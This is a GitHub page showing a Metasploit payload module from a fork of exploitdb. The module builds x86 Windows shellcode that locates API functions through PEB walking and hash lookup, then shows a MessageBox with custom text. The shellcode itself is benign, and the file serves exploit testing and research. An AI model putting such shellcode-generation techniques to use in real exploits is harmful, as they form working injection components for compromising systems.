forked from offensive-security/exploitdb
-
Notifications
You must be signed in to change notification settings - Fork 1
Expand file tree
/
Copy path13648.rb
More file actions
executable file
·198 lines (178 loc) · 7.06 KB
/
Copy path13648.rb
File metadata and controls
executable file
·198 lines (178 loc) · 7.06 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
##
# $Id: messagebox.rb 4 2010-02-26 00:28:00:00Z corelanc0d3r & rick2600 $
##
#
# Installation instructions :
# Drop file in framework3/modules/payloads/singles/windows folder
#
# Usage : ./msfpayload windows/messagebox TITLE="Corelan" TEXT="Greetz to corelanc0d3r" P
#
require 'msf/core'
module Metasploit3
include Msf::Payload::Windows
include Msf::Payload::Single
def initialize(info = {})
super(update_info(info,
'Name' => 'Windows Messagebox with custom title and text',
'Version' => '$Revision: 4 $',
'Description' => 'Spawns MessageBox with a customizable title & text',
'Author' => [ 'corelanc0d3r - peter.ve[at]corelan.be',
'rick2600 - ricks2600[at]gmail.com' ],
'License' => BSD_LICENSE,
'Platform' => 'win',
'Arch' => ARCH_X86,
'Privileged' => false,
'Payload' =>
{
'Offsets' => { },
'Payload' => "\xd9\xeb\x9b\xd9\x74\x24\xf4\x31"+
"\xd2\xb2\x7a\x31\xc9\x64\x8b\x71"+
"\x30\x8b\x76\x0c\x8b\x76\x1c\x8b"+
"\x46\x08\x8b\x7e\x20\x8b\x36\x38"+
"\x4f\x18\x75\xf3\x59\x01\xd1\xff"+
"\xe1\x60\x8b\x6c\x24\x24\x8b\x45"+
"\x3c\x8b\x54\x05\x78\x01\xea\x8b"+
"\x4a\x18\x8b\x5a\x20\x01\xeb\xe3"+
"\x37\x49\x8b\x34\x8b\x01\xee\x31"+
"\xff\x31\xc0\xfc\xac\x84\xc0\x74"+
"\x0a\xc1\xcf\x0d\x01\xc7\xe9\xf1"+
"\xff\xff\xff\x3b\x7c\x24\x28\x75"+
"\xde\x8b\x5a\x24\x01\xeb\x66\x8b"+
"\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b"+
"\x04\x8b\x01\xe8\x89\x44\x24\x1c"+
"\x61\xc3\xb2\x08\x29\xd4\x89\xe5"+
"\x89\xc2\x68\x8e\x4e\x0e\xec\x52"+
"\xe8\x9c\xff\xff\xff\x89\x45\x04"+
"\xbb"
}
))
# EXITFUNC : Only support Process and Thread :/
deregister_options('EXITFUNC')
# Register MessageBox options
register_options(
[
OptString.new('EXITFUNC', [ false,
"Only Process (default) or Thread are supported","process"]),
OptString.new('TITLE', [ true,
"Messagebox Title (max 255 chars)" ]),
OptString.new('TEXT', [ true,
"Messagebox Text" ])
], self.class)
end
#
# Constructs the payload
#
def generate
strExitFunc = datastore['EXITFUNC'] || "process"
strExitFuncHash = "\x7e\xd8\xe2\x73" #ExitProcess()
strTitle = datastore['TITLE']
if (strTitle)
#ExitFunc
if (strExitFunc) then
strExitFunc=strExitFunc.downcase
if strExitFunc == "thread" then
strExitFuncHash="\xEF\xCE\xE0\x60" #ExitThread()
end
end
#================Process Title==================================
strTitle=strTitle+"X"
iTitle=strTitle.length
if (iTitle < 256)
iNrLines=iTitle/4
iCheckChars = iNrLines * 4
strSpaces=""
iSniperTitle=iTitle-1
if iCheckChars != iTitle then
iTargetChars=(iNrLines+1)*4
while iTitle < iTargetChars
strSpaces+=" " #add space
iTitle+=1
end
end
strTitle=strTitle+strSpaces #title is now 4 byte aligned
#and string ends with X
#at index iSniperTitle
#push Title to stack
#start at back of string
strPushTitle=""
strLine=""
icnt=strTitle.length-1
icharcnt=0
while icnt >= 0
thisChar=strTitle[icnt,1]
strLine=thisChar+strLine
if icharcnt < 3
icharcnt+=1
else
strPushTitle=strPushTitle+"h"+strLine #h = \68 = push
strLine=""
icharcnt=0
end
icnt=icnt-1
end
#generate opcode to write null byte
strWriteTitleNull="\x31\xDB\x88\x5C\x24"
strWriteTitleNull += iSniperTitle.chr + "\x89\xe3"
#================Process Text===============================
#cut text into 4 byte push instructions
strText = datastore['TEXT']
strText=strText+"X"
iText=strText.length
iNrLines=iText/4
iCheckChars = iNrLines * 4
strSpaces=""
iSniperText=iText-1
if iCheckChars != iText then
iTargetChars=(iNrLines+1)*4
while iText < iTargetChars
strSpaces+=" " #add space
iText+=1
end
end
strText=strText+strSpaces #text is now 4 byte aligned
#and string ends with X
#at index iSniperTitle
#push Text to stack
#start at back of string
strPushText=""
strLine=""
icnt=strText.length-1
icharcnt=0
while icnt >= 0
thisChar=strText[icnt,1]
strLine=thisChar+strLine
if icharcnt < 3
icharcnt+=1
else
strPushText=strPushText+"h"+strLine #h = \68 = push
strLine=""
icharcnt=0
end
icnt=icnt-1
end
#generate opcode to write null byte
strWriteTextNull="\x31\xc9\x88\x4C\x24"
strWriteTextNull += iSniperText.chr + "\x89\xe1"
#build payload
payload_data = module_info['Payload']['Payload']
payload_data += strExitFuncHash
payload_data += "\x87\x1c\x24"
payload_data += "\x52\xe8\x8b\xff\xff\xff\x89\x45"
payload_data += "\x08\x68\x6c\x6c\x20\xff\x68\x33"
payload_data += "\x32\x2e\x64\x68\x75\x73\x65\x72"
payload_data += "\x88\x5c\x24\x0a\x89\xe6\x56\xff"
payload_data += "\x55\x04\x89\xc2\x50\xbb\xa8\xa2"
payload_data += "\x4d\xbc\x87\x1c\x24\x52\xe8\x5e"
payload_data += "\xff\xff\xff"
payload_data += strPushTitle + strWriteTitleNull
payload_data += strPushText + strWriteTextNull
payload_data += "\x31\xd2\x52"
payload_data += "\x53\x51\x52\xff\xd0\x31\xc0\x50"
payload_data += "\xff\x55\x08"
return payload_data
else
raise ArgumentError, "Title should be 255 characters or less"
end
end
end
end